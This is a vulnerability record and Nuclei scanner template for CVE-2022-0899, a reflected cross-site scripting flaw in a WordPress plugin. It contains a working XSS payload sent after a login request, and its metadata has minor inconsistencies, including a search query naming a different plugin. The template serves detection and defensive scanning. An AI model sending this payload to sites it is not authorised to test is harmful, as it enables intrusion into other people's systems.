
Header Footer Code Manager < 1.1.24 - Cross-Site Scripting

Date: 2023-10-17 07:20:28
ProjectDiscovery, github.com
Tags: cve2022, wpscan, wordpress, plugin, cross-site scripting, authenticated, draftpress, attribute, admin page

CVSS3: 6.1 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.001 Low (percentile 43.5%)

The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.

id: CVE-2022-0899

info:
  name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0899
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0899
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.42122
    cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: draftpress
    product: header_footer_code_manager
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
  tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>alert(/document.domain/)</script>")'
          - 'contains(body_2, "All Snippets")'
        condition: and
# digest: 4a0a00473045022100b32980c7114cd709456c3dc2981fea5cc461cdceea2fa72435ff2eaef203ffec0220073fa37edb8092f60568dcfaf1f76c0222a33a59781499c8ecea5fcbb9e667b6:922c64590222798bb761d5b6d8e72950
